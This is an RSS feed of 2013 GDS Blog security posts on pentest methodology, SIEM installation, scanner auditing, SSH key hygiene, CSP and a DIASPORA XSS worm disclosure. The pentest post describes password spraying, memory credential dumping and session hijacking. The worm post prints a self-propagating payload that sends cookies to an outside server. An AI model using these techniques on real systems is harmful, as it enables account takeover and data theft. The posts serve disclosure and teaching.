<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Observatoire de la securite Internet</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>When Domain Admin Is Not Enough</title><description>2013-09-18 16:06:57 - GDS Blog :    When conducting a network pentest we often find the goal of the tester, at least on a Windows domain network test, is to get Domain Admin That is well and good, but for impact nothing beats capturing the CIOs desktop, documents or e-mail So how do we get there  When we are testing networks we often talk about network mapping and recon Its almost described as a matter of course in most books on network hacking Sadly, often a tester will run Nmap and not even wait for the results before kicking off a scanner or running an exploit In actual fact, network reconnaissance can be the most important part of an assessment, and Nmap isn t always the best or most appropriate tool for this particular job Never underestimate the use and value of tools such as Wireshark, traceroute, ping and tcptraceroute in mapping a network When pentesting a Windows network, we re probably going to be running Nmap near the start of the engagement, however at this point we are unlikely to be authenticated to the domain We need to remember to come back to this as soon as we have managed to gain access to our first domain account - the first toehold The Kung Fu Toehold Getting that first toehold can be tricky, but there are a number of ways  1 Sniffing  ARP poisoning or even just listening to broadcasts  2 SMB traffic redirection 3 Exploit a single unpatched host With SMB redirection we can capture hashes and crack them, but that is CPU intensive and often there are easier ways However sometimes the simple ways are still the best - printers can be very helpful With only read access to printer queues, we have a goldmine of usernames Dont Lock Out The Domain Next we can kick-off a brute force attack - but lets be smart about this Most Windows networks have account lockout policies in place This could result in a tester doing a Denial of Service on the network if they re not careful Try explaining to a systems admin why you ve locked out all of the users in the middle of the day - not something you ever want to have to do So we need to think around the problem and proceed carefully On a recent test we managed to gather 20 usernames, and the lockout policy would have locked us out after 5 failed logins So we carefully chose 3 passwords and tried them on all the accounts This resulted in 4 compromised accounts In this situation the password policy strength was set to complex passwords, but human nature being what it is  Password1  worked for more than 1 account - make sure you think like a normal person, not a security tester If we know a company has a strong password policy  for example, 6 characters, 1 special, upper and lower , try and come up with the easiest options that match this  Pa55word  would work, or even better use permuteexe and give it the company name From Humble Beginnings Now that we have one or two user accounts we can get all the usernames from the domain, we can fully identify what the password policy is, and we can find out who the domain administrators are Tools such as enum4linuxpl and Nmap are fantastic when we want to enumerate users from domain controllers We could then just repeat this process and brute force out passwords hoping to get lucky - perhaps a domain administrator has got the password of  Passw0rd1  but its unlikely If we use the information we have gathered to identify interesting targets this would more likely result in access to the real goal - data Also remember with domain access you can potentially view corporate Intranet pages, or sometimes we can see this without a username and password If we don t already have it from external recon, we are likely to find data on the CIO  their name at very least , and perhaps members of the Board Remember that organisational charts are often a boon in this case At this point, hopefully, we now know who we are targeting and can make a decent guess at the format of the username Stay On Target So now we have our target accounts, what next  We could use the company Intranet site again  perhaps finding XSS and using tools like  Shell of the Future  or  BeEF  to poison requests from the users that we particularly want when we see them come in We could even redirect those requests to Metasploit http-ntlmrelay and target specific boxes This may succeed, however, it could be less surgical than we require Enter Nmap again With Nmap s SMB scripts and an authenticated user acount we can get the name of a user that is logged in and the IP address of their host machine when scanning the domain controller This gives us our target host - the CIOs laptop desktop Once again we may get lucky - this box may not have been patched However it is likely that it will be, CIOs are important and tech support like to make sure that they re safe What next  We could send a malicious document via email This may hit antivirus, or they may not open it What we need is hosts that the CIO has sent their password to Say we breach a mail server, Citrix server, or even an Intranet web server - we are likely to get something very useful, user passwords Lost of users will login to these hosts We can start off by pulling out the hashes from these machines and passing them across the network It is likely that more systems can be compromised this way, however there is a cleaner way If we want the CIOs desktop we really also want the password in our hand, so we can turn to WCEexe, mimikatz or procdump Windows Credentials Editor, mimikatz and procdump are awesome pieces of software They will pull decrypted passwords out of memory  in the case of procdump just the memory  No nasty cracking, rainbow tables or hash passing We just need admin access on the host that our target is logged into, and to disable the antivirus  we ve found pulling passwords out of memory can trigger some modern antivirus solutions  This could be a mail server, Citrix server or perhaps even a desktop We dump the passwords and were done So we now have the CIOs credentials, but there s one more thing to think of One Desktop To Rule Them All The next activity is so simple it took me a while to realise how powerful it was Presuming we have admin access to a machine on the domain  the CIOs desktop , we can RDP into that host as a privileged user, use  Run As  with the password or token  via incognito  of the CIO to get a shell, and kill that user s instance of Explorer Then run Explorer from the shell that you have just started Your desktop will restart as the CIO user We can now easily startup tools like Outlook and have Windows do all the hard work for us We can also use this technique when targeting developers Using Windows authentication tokens extracted by Metasploit to do the same thing and start up SQL Server Management Studio and  if the SQL Servers are using domain authentication  connect directly to development SQL Servers Often the passwords used on those machines can potentially give you access to production hosts So just remember Domain Administrator is good, but it isn t always the most interesting user on the network Tools  Nmap  smb scripts  Nmap  ldap scripts  Traceroute Tcptraceroute Ping ldapsearch Responder Metasploit  smb_relay  Metasploit  http_ntlmrelay  procdump mimikatz Wceexe  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/469378.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/469378.shtml</guid></item>
<item><title>AlienVault OSSIM 42 - Enabling Custom Install</title><description>Secuobs.com : 2013-09-04 16:15:20 - GDS Blog -    A tip that came up from a recent engagement was that with the release of the OSSIM installation ISO for version 420, the ability to do an Advanced installation is now disabled Because we were performing a number of enterprise installations we really wanted to be able to customise many aspects of the initial installation, such as partitioning, mail servers, and more importantly, installation profiles The old AlienVault 410 installation ISO has the  Custom Install  option In order to get this functionality back within the default installation, you need to modify the boot parameters presented to you within the 420 ISO The boot parameters are currently   installamd vmlinuz preseed file cdrom simple-cdd defaultApreseed debian priority low vide vesa ywrap,mtrr vga 788 initrd installamd gtk initrdgz quiet AllinONEauto   vga 788 These are very hard to see within the modification window You need to delete the  AllinONEauto  option, change the preseed file option to  cdrom preseed , and add the  preseed interactive true  option The final parameters will be   installamd vmlinuz preseed file cdrom preseed preseed interactive true debian priority low vide vesa ywrap,mtrr vga 788 initrd installamd gtk initrdgz quiet   vga 788 Enter this as the boot options, and now you will have access to the  Custom Installation  within the 42 ISO  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/466548.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/466548.shtml</guid></item>
<item><title>Porting Existing Security Tools to IronWASP Modules</title><description>Secuobs.com : 2013-09-03 16:21:27 - GDS Blog -    IronWASP is a high-extendable open source system for web application vulnerability testing In this blog post I m going to walk through the process of porting existing security tools  with available source code  into IronWASP modules For this, I will be using TestSSLServer  http wwwboletorg TestSSLServer , a simple command line tool that can be used to test the SSL TLS security configuration of a remote HTTP server The benefit of using this tool is that it does not require OpenSSL or any other dependencies I ll be using the NET port for this example Lets begin by understanding what an IronWASP module is IronWASP has a concept of plugins and modules A module in this sense could be a standalone tool that may or may not use any of the built-in API methods provided by IronWASP These could be tools that you may want to keep handy in your web security testing arsenal, which would not be categorised as plugins Modules can be written in either Ruby, Python, C  or VBNet I will be coding my module in Ruby The various challenges we may face when creating such modules would include     Exporting methods and debug events from the original tool to be consumed by our module    Building user friendly GUI elements for the module    Running the tool in a background thread so that the IronWASP UI does not hang while the module completes its task Lets go ahead and handle these step by step To begin the process, use the built-in wizard to create a basic template This can be found in  Dev Tools  Coding Assistants  Module Creation Assistant  After the basic template is in place, we can get to the original tool and prepare it to be ported into a module First thing that I needed to do was to export certain information events from the tool that I could use within the module to display to the user what the tool was doing In this case this can be done by creating an event in the C  code Events can be created using a delegate See the example code below for creating the delegate and event public delegate void OutputMessageEvent string Output  public event OutputMessageEvent OutputMessage   remove static public bool OutputEventSet   get   if  OutputMessage   null    return false    else   return true        public void DebugOutput string Output    if  OutputMessage   null    try   OutputMessage Output n    catch         We then use the  DebugOutput  public method to return the data as a string I have used this method in various places in the code to create a run trace of the application This will be later consumed from the module code and the return string will be displayed to the user The following code is used in the Ruby module to track these events and display in the output text box    Handle the output events thrown by the TestSSLServer dll and print the messages if not  tssoutput_event_set _outputTextText      tssoutput_message do msg _outputTextAppendText msg  end end Next I had to replace all the  ConsoleWriteLine  calls and instead, collect them in a  Stringbuilder  which will be used to store the results and return them at the end of execution This should be sufficent to start building our module I compiled the TestSSLServercs file into a DLL which I will be using in my Ruby module The next step is to create a GUI that the user would use to test the SSL TLS server IronWASP has a built-in GUI designer that provides the most frequently used GUI controls needed for creating modules To begin, open the GUI designer from  Dev Tools  UI Designer  Designing the GUI is straightforward and if you have designed a GUI using Visual Studio, then you will find it familiar Once you have created a basic GUI that you are happy with, click the  Generate Code  option in the UI designer This will generate the required code for creating the GUI elements that can be included in the module code The UI designer generates code in Ruby, Python and XML The Ruby and Python code can be used directly in the module code whereas the XML is used in case you need to make any further changes to the GUI later, so remember to save the XML along with the Ruby or Python code In this example, the GUI code can be found in the  startUI  method of SSLSecurityCheckerrb Here is a screenshot of the UI designer with the GUI created for this module The next challenge is to execute the module code in a background thread IronWASP makes it very easy for module and plugin developers to handle threading code I make use of the  IronThread  class provided by the IronWASP API to execute the  RunChecks  method See https githubcom Lavakumar IronWASP blob master IronWASP IronThreadcs for more details on IronThread class and how it can be used in your module code In this scenario I use the  Run  method from the IronThread class This functionality is handled within the  Click  event for the  Go  button   Event handler for the Go button _goBtnClick do   For running the code in a background thread, use the IronThread class IronThreadRun  Procnew do exec_checks hostNameValueText, _portValueText, _outputText  end   end Now our module is ready This module can be executed from the IronWASP Modules tab Once the module is executed, the run trace created using the event in the original tool is displayed in the Output window When the module completes the execution of the tests, the final result is displayed in the Output window as shown below This way we can port existing tools to IronWASP as modules or create out own modules using Ruby Python, C  or VBNet Modules can make use of the full IronWASP API The complete code for this example can be found here  https githubcom GDSSecurity SSLSecurityChecker  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/466345.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/466345.shtml</guid></item>
<item><title>Avoiding Residual SSH Keys on Ubuntu AMIs</title><description>Secuobs.com : 2013-08-28 14:48:53 - GDS Blog -    Note  This item has been cross-posted from the SendSafely blog You can find the original post at http blogsendsafelycom post 59101320815 avoiding-residual-ssh-keys-on-ubuntu-amis If you ve ever used Amazon EC2 to run Linux, you probably know that the AWS console prompts you to choose an SSH key-pair when spawning a new Linux instance Public private key pairs allow you to securely connect to your instance using SSH after it launches On Ubuntu Linux, the SSH public key is made available to the instance by the Ubuntu CloudInit package This package is installed on all Ubuntu Cloud Images and also in the official Ubuntu images available on EC2  https helpubuntucom community CloudInit  It runs at boot time, and adds the SSH key to the default user s  ssh authorized_keys file image What you may not realize is that by default, CloudInit does not replace the authorized_keys file Instead, it appends the key to the existing authorized_keys file Depending on your build process, this could create a security exposure if you are not careful, since it can lead to residual keys building up on the image over time as AMIs are created This is especially true when the lines between development and operations can be blurred  often referred to as DevOps , a huge trend that will likely continue with regards to applications that run in the cloud Consider this example  A team wants to launch their application in AWS With cool features like Elastic Load Balancers  ELBs  and Auto Scaling, it s a perfect platform to get scalability without breaking the bank They ll typically start by tasking someone from the team to get a clean base server image  AMI  of the operating system from a trusted source They launch an EC2 instance from the AMI and customize the local stack to meet the specific needs of the application  install non-standard packages, get the web server configured, etc  Once everything is installed and patched, they load the application onto the instance and perform some final configuration tweaks to get things up and running Everything appears to be working as intended, so the initial plan to launch in AWS is green lighted The next logical step is for the team to create an image of the new custom build to avoid having to re-install everything in the event that the instance gets hosed or otherwise corrupted A new AMI from the running system is created, which will serve as their new  base  AMI Going forward, their release deployment process will start by launching a new instance of the base AMI, applying any recent system patches  hopefully , and deploying the latest version of the code Provided the application passes pre-production testing, the instance is ready to be pushed into production When using AutoScaling, ELBs launch and terminate EC2 instances as needed to meet changing load demands over time Since each new launched instance needs to originate from an AMI, a new AMI that has the exact copy of the code you want running in production will need to be generated The newly configured deployment instance will usually serve as the source for the AMI, so a final AMI gets created for the ELB to use In many environments, development teams are not given unrestricted access to production systems If a team wants to get an AMI spawned in production, they would likely need to request this be done by a separate production support team In all likelihood, the production team launch their AMIs with a separate SSH key that the development team rightfully does not have access to What could go wrong here  Every time you create an AMI from a running EC2 instance, the root SSH key that was used to spawn the instance gets copied into the AMI Looking at the history of the final production AMI used in this example    It was launched from a clean install image  no pre-loaded keys  and was configured with a new ssh key by the EC2 wizard   That key was then copied to the  base  AMI, which was then launched during the pre-deployment setup If a different SSH key was used during this launch, there are now twoSSH keys on the new instance   Both of those keys get copied when the  deployment  AMI is created, which might then launched by the production team using yet another SSH key Unless someone thought to clean out the un-wanted keys before creating that final AMI, all three SSH keys end up on the running host in production To avoid this problem, you ll want to make sure that production engineers  not your developers  are tasked with creating AMIs that will ultimately be used on production ELBs They should specifically remove all un-wanted SSH keys from the authorized_keys file before creating the AMI The process of checking for un-wanted SSH keys should already be baked into most server deployment processes, but this step can easily get overlooked when AMIs are used for frequent deployments  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/465401.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/465401.shtml</guid></item>
<item><title>Using Nessus to Audit VMware vSphere Configurations</title><description>Secuobs.com : 2013-06-05 18:38:54 - GDS Blog -    Nessus has the ability to run compliance checking scripts for many different services and servers, and is a great resource for aligning a server with  best practice  server hardening guides, such as those released by the Center for Internet Security  CIS  Recently VMware officially released the vSphere 51 Hardening Guide, for which Tenable have then released Nessus compliance scripts to check for the recommended configurations When using these scripts, there are a few forum posts  provided by Nessus and Tenable  that provide some information, and although they can collectively provide good enough instructions on how to run the scan, they omit a few details that I would have been very handy to know prior to performing these compliance checks So, taking my own experiences with the audit scripts, and merging these with the already available resources, I d like to provide others with some straightforward answers to the questions and issues I had when first running the VMware vSphere compliance audit scans How to Perform a Scan Our goal is to create a minimal compliance scan that is based around the VMware vSphere Compliance audit, and also reduces the number of plugins required to effectively run the scan The reason we want to segregate the Policy Compliance scan  although it is not required  is that it will help teach us how to perform the compliance scan as a standalone scan, and can also help troubleshoot issues when learning the new scan typeJumping right in, let s create a new Nessus Policy and modify it to fit our needs Within the Policy, all of the General Settings can remain the same, and we want to modify the Plugins enabled for our new Policy Only enable the following plugins so the scan will target the VMware Policy Compliance audit   General   Service Detection   VMware ESX Local Security Checks   VMware vCenter vSphere Compliance Check  under  Policy Compliance  The idea of selecting only these Plugins is to greatly reduce the amount of time Nessus will take when all we are concerned with is performing a compliance check scanAfter configuring the Plugin information, we want to change the Preferences to match our VMware configuration Under the  Preference Type  drop-down menu we select  VMware SOAP API Settings  Now we fill in the administrative VMware user name and password If the VMware host is using a self-signed certificate, ensure the  Ignore SSL Certificate  checkbox is selected After configuring our credentials, the last step to creating a policy is the select the appropriate audit file Under the  Preference Type  dropdown, select the  VMware vCenter vSphere Compliance Checks  and then browse to the appropriate audit file We will be using  vmware_vsphere_5x_hardening_guideaudit  Now that our Policy is created, we need to start a new scan and ensure our VMware host is set as the target Once the scan has finished, we will see a Compliance option under the Scan Results indicating the VMware Policy Compliance plugin ran properly Interpreting the Results Now that we have completed a scan of our VMware host we can start to review the results It s recommended that a copy of the relevant VMware vSphere Hardening Guide is available so that when you re reviewing the results the best practice guide can be referenced When reviewing the results, under the  Reference Information  the Profile directory correlates directly to the Profile provided in the hardening guide for each compliance check The profiles  taken from the VMware Guide  give context as to the type of requirements for your environment, and potentially compliance rules that are unnecessary for your needs   Profile 3  guidelines that should be implemented in all environments   Profile 2  guidelines that should be implemented for more sensitive environments, eg those handling more sensitive data, those subject to stricter compliance rules, etc   Profile 1  guidelines that only be implemented in the highest security environments, eg top-secret government or military, extremely sensitive data, etc When performing a scan using an unconfigured default audit file, one of the first things noticed will be the number of failed compliance rules Since this is what I ve done for this example, the list will go on for at least 50 failed compliance checks  Once we dig deeper in some of the results we realize an un-tuned audit file can provide a poor representation of how our server is hardened Reviewing the results manually gives us the ability to interpret a few categories of  false positives  in the sense that the audit cannot be run accurately because it is not configured to the local environment In most cases, everyone will run the default audit file at least once before realizing that they should have tuned the configuration for their environment No Audit File Tuning When the audit file is not tuned for the environment, all of the variables that are supposed to be set within the configuration will be flagged as failing their compliance checks When viewing the Description for these false positive checks, you will notice  NOTE  Update  VARIABLE  to the appropriate value for the local environment  being present In order to correct these results, every variable that is supposed to be customized for the local environment will have to be set This is done by modifying the original audit file that was added to the Policy VMware Tools Not Installed If VMware Tools are not installed on the Virtual Machines that, there will be the occurrence of  toolsNotFound  found within the Affected Host List This information is much easier to view if the Nessus scan results have been exported to HTML first, and I recommend exporting the results to HTML and viewing them within Nessus at the same time, especially when scanning multiple hosts This can be fixed in one of two ways, by either installing VMware Tools on the guest operating system  which isn t necessarily ideal for each situation , or by editing the audit file and remove the compliance checks that require VMware Tools Tips   Tricks Some of the  gotchas  and things I wish I had known specifically before performing these scans in test and production environments These tips will hopefully reduce some confusion when interpreting the results, and ensuring the scan has run properly   If there are multiple audit files selected during the compliance review under the  VMware vCenter vSphere Compliance Checks , they will not be able to be separated under the Nessus results because they will have the same plugin ID  64455 This can be problematic when the audit files are not configured properly because you cannot filter on each of the separate audit file s results   If you use multiple audit files when creating the Policy  as recommended by the Nessus forums , there will be duplicate entries within the compliance checks Because you can t separate the results this becomes even more problematic, and a better thing to do would be to use each audit file separately for a separate Policy until they are properly tuned   You can test your credentials by installing and configuring the vSphere Client and attempting to authenticate using the client as one option But, if this is not installed on your machine, you can t install it, or don t want to install it, a quicker test to see if your username and password are correct, and to verify that VMware vSphere is running the API, is to navigate to the  mob directory of the target Once properly authenticated you will be presented with the API interface This is a useful test when the credentials are being supplied by an external party, or are particularly long  and easy to fat-finger    When creating the VMware vSphere Policy, it must be adjusted for every unique username and password combination for each host So, if you are scanning multiple hosts and they do not have the same username and password, the Nessus Policy will have to be updated for each host scanned   If you ve run a scan and want to filter out Compliance Check results more efficiently to match the hardening guide, a suggestion is to export the data to a CSV file and open it with a spreadsheet application that can use more complex filtering requirements that Nessus does not provide    Plugin ID is 64455  vSphere Compliance Plugin ID    AND Contains FAILED in the Description   AND does not contain  update   in the Description   AND does not contain  NOT found  in the Description This will omit the false positives that occur from a lack of an audit file configuration and can provide you with a quick-win before you have the ability to properly configure the audit file for the local environment  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/449556.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/449556.shtml</guid></item>
<item><title>Retrofitting Code for Content Security Policy</title><description>Secuobs.com : 2013-05-14 16:37:09 - GDS Blog -    Note  This post has been crossposted from the SendSafely blog You can find the original post at http blogsendsafelycom post 50303516209 retrofitting-code-for-content-security-policy In a previous blog post we shared how SendSafely uses Content Security Policy to minimize the risk of Cross-Site Scripting, commonly referred to as XSS  if you didn t catch this post, you can check it out here  While it would have been easiest to design our site to use CSP from the beginning, the initial version of our website grew out of an internal research project and was not so fortunate As a result, we needed to refactor a lot of our UI code to comply with a strict CSP Specifically, we needed to get rid of the following two patterns that were fairly pervasive in our code    Inline scripting A sound CSP does not allow HTML and JavaScript to co-exist in the same document Prior to CSP, we had a lot of in-line scripts   Script code served from the same host CSP best practices dictate that scripts should only run from a dedicated sub-domain that serves static content This means that JavaScript not only needs to be in separate files, but also served from a completely different host Given the above requirements, we needed to figure out an efficient way to convert our existing UI code As it turned out, our code followed a few simple patterns Once we came up with a methodical way to convert each pattern, we had a game plan for moving forward with the site-wide conversion Common Code Patterns When we analyzed HTML our code to see how we were using Javascript, we were broadly able to categorize about 90pourcents of our use cases into two buckets    Links or tag events that called no-arg functions  Do something   Links or tag events that called functions with one or more arguments   The first case was simple For elements that previously called a function on a specific event or on a click, we started by giving them a unique element id Then, in the JavaScript code that loads from our static domain, we have a routine that always fires and looks specifically for each relevant id and programmatically registers the event on that element So, for example, the first sample we showed you above would get converted to the following HTML  on our dynamic domain  and JavaScript  loaded from the static domain  HTML  Do something JavaScript  var link   documentgetElementById my-link  linkaddEventListener click , doSomething, false  If you use JQuery  like we do  it can be done in a slightly more elegant fashion   my-link click function    doSomething    The second case is not quite as simple, but still relatively straightforward The main difference between the first and second case is that we need to pass arguments into the JavaScript function One of the most widely supported  and earliest adopted  parts of the HTML5 spec across all browsers is the data-  element It s supported by all major browsers and has been for some time  http caniusecom feat dataset  This allows us to declare data attributes on a given HTML element that can be referenced elsewhere by JavaScript, so they are perfect for holding the values we were previously passing in as function arguments We use the same technique as before to register the click event, but also include references to the data-  attributes in the function call So, going back to our example, the second sample we showed you would get converted to the following HTML  on our dynamic domain  and JavaScript  loaded from the static domain  HTML   JavaScript  JQuery   my-email-field keyup function   doSomethingElse thisgetAttribute data-arg-one , thisgetAttribute data-arg-two    Web Workers Unfortunately not all of our JavaScript was covered by the above two examples One of the more notable exceptions to this was how to incorporate HTML5 Web Workers into our policy We use web workers when we encrypt and decrypt files using JavaScript since CPU intensive operations like that would cause the entire browser UI to freeze-up during the process  which can take anywhere from a few seconds to several minutes  As it currently stands, most browsers require that web workers execute from JavaScript on the same domain that the page is loaded from So, in the case of our website, pages loaded from wwwsendsafelycom cannot run a web worker loaded from staticsendsafelycom This is less than ideal from a security perspective since it requires an exception to our otherwise tight CSP In order to minimize the places where this exception is allowed, we defined a slightly looser policy for the two URLS that we use for sending  encrypting  and receiving  decrypting  files Unlike other URLs on our site, these two pages allow scripts originating from the dynamic server to execute We still don t allow in-line scripting, so the exposure on these pages is still somewhat minimal since a separate file still needs to be loaded from the same server For now it seems we will need to live with this approach until a solution for loading web workers from a separate domain is possible Third Party Scripts  reCAPTCHA  Like many sites, SendSafely uses reCAPTCHA to prevent bots and other automated processes from interacting with certain parts of our application The reCAPTCHA AJAX API requires us to load certain scripts and images from Google servers  specifically from wwwgooglecom recaptcha , which forced us to include wwwgooglecom in our CSP  refer to the previous post to see how we ve done that  In an ideal world, that would be the only change needed, but life is rarely that simple Unfortunately, it doesn t look like the reCAPTCHA AJAX API plays nicely with CSP since it doesn t run without the inline-scripts and unsafe-eval directives Out of all the CSP directives to allow, these two create a huge increase in attack surface since they expose a wide variety of XSS attack variants To better understand why the reCAPTCHA AJAX API requires these directives, let s take a closer look at the two steps needed to implement the API  taken fromhttps developersgooglecom recaptcha docs display  Step 1  Load the API JavaScript from Google  Step 2  Display the CAPTCHA using the following code Recaptchacreate your_public_key ,  element_id ,   theme   red , callback  Recaptchafocus_response_field   At their surface, both steps seem easy to run with CSP The problem, however, lies in the contents ofrecaptcha_ajaxjs Specifically, the following three code patterns are present in this file and unless re-factored require inline-scripts and unsafe-eval permissions    Inline Event Handler Definitions   Inline Script within HREF Attributes   Use of String-to-Code in Function Calls After some research and initial attempts to  unsuccessfully  contact the reCAPTCHA team at Google, we decided to take a stab at re-factoring some of the code to make it CSP friendly Refactoring third party code is never ideal, but if we could restrict our changes to just presentation-level code and not touch the code that invokes the server API, we minimize the risk of introducing any breaking changes going forward As it turns out, the changes to recaptcha_ajaxjs required are very minimal and self-contained in that single JS file Once updated, all we needed to do was load the re-factored JS file from our server instead of remotely from the Google servers Let s take a close look at what was changed Inline Event Handler Definitions Many of the reCAPTCHA HTML elements use in-line handler definitions for the onclick event In order to comply with CSP, the handler definition must be rewritten in terms of addEventListener as shown below  the  a  function is used to dynamically generate an HTML  a  tag with the specified ID  Very easy Before  a recaptcha_whatsthis_btn onclick   function    Recaptchashowhelp  return  1  After  documentgetElementById recaptcha_whatsthis_btn addEventListener click , function    Recaptchashowhelp  return  1  Inline Script within HREF Attributes reCAPTCHA uses a custom function to dynamically build certain document elements The last argument for one of these functions  named c  is assigned to the HREF attribute of the element, which in some cases includes JavaScript For these cases, the function call was modified to remove the last argument, and instead bind the argument value programmatically to the onclick event  using addEventListener as in the previous example  Before  c recaptcha_reload ,  refresh ,  refresh_btn ,  javascript Recaptchareload  After  c recaptcha_reload ,  refresh ,  refresh_btn  documentgetElementById recaptcha_reload_btn addEventListener click , function    Recaptchareload  Use of String-to-Code in Function Calls Some JavaScript functions, like eval  for example, allow you to specify a function as input or alternatively let you pass string content that will get treated and executed as code  often referred to as string-to-code  Passing a string argument to any of these functions  eval, setinterval, etc  requires the unsafe-eval directive, which is definitely something we do not want to allow In this case, as shown below, the code is relatively painless to convert since the string value is not dynamic in nature This was the simplest change of all Before  Recaptchatimer_id   setInterval Recaptchareload t , a  After  Recaptchatimer_id   setInterval function  Recaptchareload t   , a  By changing those three subtle patterns, we were able to safely run the reCaptcha AJAX API without loosening our CSP We welcome anyone in the same boat to leverage our re-factored JS code to run reCAPTCHA with CSP on your own site As mentioned, we attempted to contact the reCAPTCHA team at Google during this effort with no success Hopefully our changes will one day get reflected in the ReCaptcha AJAX API code  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/445314.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/445314.shtml</guid></item>
<item><title>Writing an XSS Worm</title><description>Secuobs.com : 2013-05-08 15:14:02 - GDS Blog -    User privacy is an increasingly important part of the Internet, and the social network DIASPORA  prides itself upon the creed that users own the data that they publish on sites In a modern world, security often takes precedence over belief There is no reason that a malicious attacker can t take the data which DIASPORA  stores on their own servers and use it for whatever purposes they desire Multiple vulnerabilities  including an XSS exploit  manifest themselves in DIASPORA , such that it was possible for any user to export a user s profile data and potentially compromise every DIASPORA  instance  or in DIASPORA  terminology, pod  running on the Internet To begin with the methodology for achieving this, first an initial exploit must be found In the case of DIASPORA , it is a Persistent Cross Site Scripting  XSS  vulnerability found in the user s name as it is rendered un-encoded back on the the user s profile  ie  u user_name  DIASPORA  uses a set of JSON formatted attributes to create a navigation bar with user specific information such as name, id, and email  windowcurrent_user_attributes      id  3,  guid   5a2d8a950e39165e ,  name   Kevin Chung ,  diaspora_id   superduper localhost 3000 ,  avatar      Normal Profile Data In searches and the user s public profile page, their name is rendered back to other users un-encoded This is our best medium for spreading our payload not counting sending out mass messages In searches, the user must show up in the autocompleted form for it to be vulnerable The full search page is not susceptible to this vulnerability DIASPORA  will do escaping of quotes and slashes, but it does not do any form of encoding for the name field There is a size limit of 32 characters on each the first name and last name and the two are separated by a space in the script thus giving us 64 characters to work with Knowing this, it is possible to change our first name to  and our last name to alert 0  which would achieve the a mostly boring, standard XSS testing payload You ll notice that the first name starts with a  which closes out the original start tag and then begins its own script tag    alert 0 ,  avatar   assets user defaultpng ,  handle   jedi_guy localhost 3000 ,  url   people 927643f9c89784b1       Profile with XSS Instead of just alerts, we can give ourselves a much larger space to work with by using  as our last name The googl URL should point to a JavaScript file of our choosing Now that we are not limited by size, we can go ahead and begin propagating ourselves throughout the DIAPOSRA  pod Fortunately, DIASPORA  leverages jQuery, so writing JavaScript will be much less verbose than it normally tends to be If we wish to be extremely destructive, we can simply do an AJAX GET and POST to have any user which gets hit with our payload become a propagator of the payload as well We require the GET initially as DIASPORA  includes a nonce on the profile page in order to prevent Cross Site Request Forgery  CSRF  attacks and therefore our subsequent POST requires a valid nonce in order to be valid  html hide  if windowlocationpathname    profile edit  windowlocation 404    else if windowlocationpathnamesubstr 1,2     u   windowlocationpathnamesubstr 1,6     people  var first    find prev html  var second    find next html  eval first  You re Owned  second    else  var intervalID   setInterval function  var first    find prev html  var second    find next html  eval first  You re Owned  second   ,5     document ready function  windowclearInterval intervalID   message hide   html show   documentcreateElement img attr src     http localhost diasporaphp cookie documentcookie    deploy googl AT64G  function deploy payload   get profile edit , function data    var first_name    profile_first_name ,data val  var last_name    profile_last_name ,data val  if  first_name    ,  profile tag_string   ,  tags  tags,  file   ,  profile bio  bio,  profile location  loc,  profile gender  gen,  profile date year  year,  profile date month  month,  profile date day  day,  profile searchable   true ,  commit   Update Profile          Exploit Code Next it is important to determine what can be used to spread our payload The most obvious is our profile which has our malicious name We can also adapt our script to scrape contacts and send them messages asking them to visit our profile, replicating how many XSS worms have propagated in the past DIASPORA  makes an additional oversight in that the search autocomplete functionality will render names un-encoded to the user Thus users who are not directly connected to infected users can additionally be infected by searching and finding an infected user Now that we ve begun spreading ourselves through DIASPORA  we could capitalize upon what we have accessible DIASPORA  allows users to download their photos and an XML file containing their data  posts, contacts, messages, profile information, and a GPG key pair  We can have JavaScript send the user s cookies to a server as DIASPORA  makes no use of the HTTPOnly flag for their session cookie If HTTPOnly was enabled it wouldn t really matter, as we could have the XSS payload pull the XML and POST it to our server instead of having the server get it In summary, we were able to utilize a variety of vulnerabilities in DIASPORA  to augment the main XSS payload and potentially acquire significant amounts of user data This reinforces the message for web developers  no user input should ever be trusted Unencoded user input is of course the root cause of this issue Input validation, and input or output encoding should always be used in any scenario where user input is taken Additionally, HTTPOnly should be on all cookies not required to be accessed by JavaScript This is not a cure all, as it is still possible to submit queries through XSS riding on the valid session stored in the cookie without stealing it While typical nonce based CSRF is in place, XSS is able to bypass it easily A CSRF referrer check should be put in place for the profile page as an attacker would not be in a valid position to spoof the referrer for another user but themselves To clarify, profile edits should be validated to only come from  profile edit and not from any other location on DIASPORA  While XSS can typically be used to bypass CSRF referrer checks, in this scenario the attacker would not have control over the normal edit profile page as it would be on an uninfected user This would have successfully prevented a spread of this XSS worm This issue was reported to the developer at 2013-02-01 06 53 36 and the patch was committed at 2013-02-01 13 20 31  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/444194.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/444194.shtml</guid></item>
